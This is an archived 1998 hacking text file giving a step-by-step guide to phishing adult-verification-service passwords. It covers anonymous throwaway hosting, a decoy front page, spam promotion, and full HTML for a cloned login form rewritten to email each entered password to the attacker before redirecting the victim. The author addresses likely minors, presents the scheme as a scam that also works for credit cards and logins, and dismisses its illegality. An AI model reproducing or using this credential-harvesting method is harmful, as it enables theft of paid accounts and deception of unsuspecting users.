TUCoPS :: AOH Originals :: hack-avs.htm

Harvesting AVS (Adult Verification System) Passwords
Harvesting AVS Passwords
[an error occurred while processing this directive] [an error occurred while processing this directive]
Harvesting AVS Passwords
©left 1998 Homo Ex Inferis
This file originated at www.artofhacking.com.
                    The Fixer's Tech Room Presents

            <<<          Harvesting AVS Passes          >>>

                    (C)opyleft 1998 Homo ex Inferis


                   What Freud and Scrooge Understand

OK, you downloaded this file because you want one thing... PORN!  And
you don't want to pay to use each of the dozens of AVS's (Adult
Verification Services) out there that most good porno sites sit behind.
You know what I am talking about, that "adult check" password page where
you have to enter a password that proves you're an adult to get into the
site.  Only catch is, that password can cost up to $69!

So what do you do?  Well, you can fork over a minimum of $25 for just
ONE AVS pass which will only be good for a minority of sites, or you can
try and commit credit card fraud, which will get you nowhere but busted
fast, or you can try begging for "hacked" passes in newsgroups, which
will get you flamed and treated like a loser.

Or you can use your brain and get yourself a free pass, or use your
brain and expend some effort and harvest a crapload of them!


                       The Easy Way to Free Porn

If you're an adult, perhaps the easiest way to get a free AVS pass is to
run an adult site yourself.  Most AVSes give their webmasters free
accounts.  All you have to do is put up a free web page somewhere with a
few dozen GIFs or JPGs of naked people, sign up with an AVS as a
webmaster, and that's it.

If you put up a fairly good site and advertise it well (sorry, that
means spam or IRC bots) then you stand a really good chance of making a
good secondary income from the AVSes, as they all pay webmasters for
every customer who signs up for a pass through their sites.  A win-win
situation for you and the AVS, and no hacking is involved.  In fact some
people actually make their living from running really big FREE adult
websites; they receive enough hits to their sites that the revenue from
AVSes and banners pays all their bills!

But none of that probably applies to you.  The fact that you're
interested in a file on how to hack an AVS means that you're probably
under 18.  If you are, shame on you!  You shouldn't know what naked
people look like or how babies are made, Jerry Farwell said so!

Sad news then if you are a young person, because it means that even if
you put up an adult website, the AVSes won't touch you with a 69 foot
pole.  So you can kiss that free pass and secondary income (which isn't
enough to live on but more than most teens' allowances) goodbye.  Oh
well.  Maybe a good fake identity will get around that, but that's
another subject for another text file.

But wait, there may be, just MAY be a chance.


                    The Hard Way - Harvesting Passes
                      (or, P.T. Barnum was right)

Let's make a few assumptions here.

(#1) You are under 18 or for whatever other reason can't sign up as an
AVS webmaster.  Maybe you're chicken that your wife will open your mail
and discover a $750 check from Porno Pass, I don't know.  Maybe you're
17 and a good bullshitter but your parents are Jehovah's Witnesses, I
don't know.  Point is, doing it the legit way is not an option for you.
That sucks but that's why I wrote this file.

(#2) You COULD still put up an adult site, because you have webspace and
porno files at hand.  Maybe you raided some Swedish BBS or something, I
don't know.  Maybe your uncle screwed his pet llama and you got video of
it, I REALLY don't want to know.  Point is, you can still put up a porno
site and all is not lost.  So you can STILL use this file!

(#3) Your webspace and email are not traceable back to you (i.e. you got
a Tripod homepage and a usa.net email address).  Note that Tripod will
cut you off if they find out you are hosting porno.  So will Geocities,
Angelfire, well pretty much all the ones you can use.  But it usually
takes them weeks to figure it out, especially if the porno isn't linked
from the default page.  The point here is that you gotta do this with a
web page and email address that you can access and control but that you
don't care about.  With this method you CAN expect to be discovered in
the act after a while, so don't risk having your real site shut down if
you have one.

OK, now if you haven't got webspace and email, go sign up with Tripod or
Geocities and usa.net or hotmail.  Give bogus information.  Spoof an IP
if you know how.  Use a public terminal if you must.  Just don't leave a
paper trail home.

Next, put up a stupid "default" page that has nothing to do with porno.
Just something that someone randomly surfing around would find.  A fan
page or something.  We don't care; the point is to avoid the webspace
host seeing your porno right away so they can turf you before you even
get started.  This default page is just a front for the purpose of
temporarily defraying suspicion from your webspace provider's TOSsers.

Then, in a subdirectory, set up an adult web page.  Use all the webspace
you are allowed, because you are going to arouse suspicion if there's
not much stuff on your site.  Make some fancy logos and set up the site
so it looks nice and legit.  Use text files (XXX rated stories) if you
have a real space crunch, they're smaller than pictures.

Now here's the tricky bit.  You need to spoof the verification page of
the AVS whose passes you wish to gather.

Now, if you just want to gather a few passes quickly, then you don't
have to go to much effort to do this, just make an official-looking HTML
form where the surfer enters his password, and a SUBMIT button below.
Only, instead of linking to the AVS's verification script, it emails the
form to your throwaway account.

If you want your page to last a little while, then you need to more
accurately spoof the AVS's logon page.  To do this, just visit another
site that uses that AVS and save the HTML source.  Change the Submit
action to email the form to your throwaway address.  Leave in everything
else, including the signup script.  Makes it look more real.  There is a
detailed example later in this article.

When all of this is set up, post a bunch of your pictures/stories to
Usenet newsgroups where people are looking for that sort of thing.
Include the URL to your spoof page.  Make sure to include HTML in your
message body so that users of web-based news services can just click to
your spoof page if they happen to like what they see.  Within the hour,
your page will begin to get hits.  Stick a counter on it if you don't
believe me.

You can do something similar with IRC Bots in channels that allow


                       Example of a Pass Catcher

Here is a form used by a well-known AVS to login to a free site.  With
minimal modification, you could use this directly, although I recommend
visiting some other sites which use this AVS to get a more up-to-date

<p><center><table border=4 cellpadding=10 cellspacing=4 bgcolor=#ffffff><tr>
<td colspan=3><center><h1><font color=#000000>
<font size=9><font color=#dd0000><b>A---- Ch---</b></font color>
<h2>is the Internet's<br><font size=6><font color=#0000dd>Largest
</font color><font size=4>&</font><font color=#0000dd> Best</font color></font>
<br>age verification system, protecting<br> <font color=#dd0000>
THOUSANDS</font color> of Great Adult Sites<br>And growing rapidly!
<br>Now With <font color=#dd0000><i>Instant Activation!</i></font color>
</td></tr><tr><td colspan=3><font color=#000000><center><h2>Enter with your
<a href=http://secure.adultcheck.com/cgi-bin/apply.cgi?4193>Adult Check
</a> ID:</td></tr><tr><td><font color=#000000><h3>Adult Check ID#:</td><td>

<!-- This is the START of the Form code you must change -->

<FORM METHOD="POST" ACTION="http://id.adultcheck.com/cgi-bin/idsearch.cgi">
<input type="hidden" name="page" value="4193">
<INPUT size=30 maxlength=30 name="id"></td><td><center>
<INPUT TYPE="submit" VALUE="Enter This Site!"></td></tr>

<!-- This is the END of the Form code you must change -->

<tr><td colspan=3><center><h2>
<a href=http://secure.adultcheck.com/cgi-bin/apply.cgi?4193>
Apply Now for an A---- Ch--- ID<br>The most Powerful ID on the
Net!</a></td></tr><tr><td colspan=3>
<center><h3><a href=http://www.adultcheck.com/cgi-bin/merchant.cgi?4193>
WEBMASTER$ click here to protect your $ite!</a>


<!-- Before you set up your adult page, ask your webmaster for    -->
<!-- instructions on how their form to email service works.  This -->
<!-- is a generic example which will need modification depending  -->
<!-- on the peculiarities of your web service!                    -->

<!-- This is the START of the HTML you must replace the above with -->

<FORM ACTION="/cgi-bin/formmail.pl" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded">
<INPUT TYPE="HIDDEN" Name="username" Value="yourusername">
<CENTER><INPUT NAME="recipient" VALUE="youraddress@hotmail.com" TYPE=HIDDEN></CENTER>
<INPUT TYPE="HIDDEN" Name="redirect" Value="http://yourwebhost.com/~yourpage/porno.htm">
<INPUT size=30 maxlength=30 name="id"></td><td><center>
<INPUT TYPE="submit" VALUE="Enter This Site!"></td></tr>

<!-- This is the END of the HTML you must replace the above with -->

Do you follow what is happening here?  This is part of an HTML form.  We
took out the "SUBMIT" part which diverts you to the AVS's verifier.  In
the original, if you submit a valid pass then the verifier diverts you
to the protected page and you are set to start whacking off.  In the
modified code, the SUBMIT part instead emails the pass to you.  When
this is done, the "REDIRECT" part sends you off to your porno page, none
the wiser.  If you have promoted your page with enough/good enough spam,
you should rack up a *lot* of hits very soon.

The one part of this that should be obvious by now is that everyone gets
through to the porn, even if they enter a wrong pass.  This means
eventually someone will notice and report your site to the AVS, which is
where all hell will break loose.  So this method won't last forever, and
you shouldn't expect it to.  But experience showed that the majority of
responses received were valid passes.

Can you imagine what it's like to check your mail, to find that you have
35 pieces waiting, all of them containing valid AVS passes?  And to do
the same again the next morning?


                            Well, what now?

Is this method "right?"  Is it legal?  Well, no one has ever been
arrested for impersonating a website.  You will definitely lose the
webspace when your game is discovered but that's as far as it should go.

The security of AVS passes is an illusion; anyone can spoof another site
and get users to enter sensitive data.  This sort of thing would apply
to credit cards or login passwords too; there is just no authentication
mechanism.  A few people may suspect something when you spoof another
site like this but most won't and will blithely enter their expensive
and sensitive information never knowing any better.  In a way, this is
kind of a hands-off form of social engineering where you don't have to
have any gift of the gab to pull it off.  Like any really good scam.

So next time you see someone posting to alt.2600 or some other newsgroup
begging for AVS passes, offer them a trade.  With this information you
should be able to fish out all the passes you will ever need and lots


[an error occurred while processing this directive]

[an error occurred while processing this directive]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH